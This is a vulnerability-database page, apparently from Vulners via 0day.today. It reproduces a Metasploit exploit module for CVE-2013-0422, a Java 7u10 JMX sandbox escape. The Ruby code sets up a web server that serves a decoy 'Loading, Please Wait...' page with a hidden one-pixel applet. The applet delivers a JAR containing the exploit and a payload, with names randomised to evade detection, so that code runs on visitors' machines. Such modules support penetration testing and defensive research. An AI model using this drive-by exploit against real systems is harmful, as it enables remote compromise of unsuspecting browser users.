Lucene search
K

Java Applet JMX Remote Code Execution Vulnerability

🗓️ 11 Jan 2013 00:00:00Reported by metasploitType 
zdt
 zdt
🔗 0day.today👁 177 Views

Java Applet JMX Remote Code Execution Vulnerability in Java 7u10 and earlie

Related
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for CVE-2013-0422
20 Dec 202018:43
gitee
Gitee
Exploit for CVE-2013-0422
4 Jan 202008:24
gitee
Gitee
Exploit for CVE-2013-0422
5 Aug 202014:46
gitee
Gitee
Exploit for CVE-2013-0422
9 Apr 202017:52
gitee
Gitee
Exploit for CVE-2013-0422
4 Mar 202022:46
gitee
Gitee
Exploit for CVE-2013-0422
13 Sep 202017:50
gitee
Gitee
Exploit for CVE-2013-0422
6 May 201909:43
gitee
Gitee
Exploit for CVE-2013-0422
22 Dec 201912:15
gitee
Gitee
Exploit for CVE-2013-0422
11 Mar 202017:41
gitee
Gitee
Exploit for CVE-2013-0422
26 Jul 202023:05
gitee
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'Java Applet JMX Remote Code Execution',
      'Description'   => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in January of 2013. The
        vulnerability affects Java version 7u10 and earlier.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Unknown', # Vulnerability discovery
        'egypt', # Metasploit module
        'sinn3r', # Metasploit module
        'juan vazquez' # Metasploit module
      ],
      'References'    =>
        [
          [ 'CVE', '2013-0422' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
      ))
  end


  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("B.class", @loader_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end

#  0day.today [2018-03-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jan 2013 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.97612
177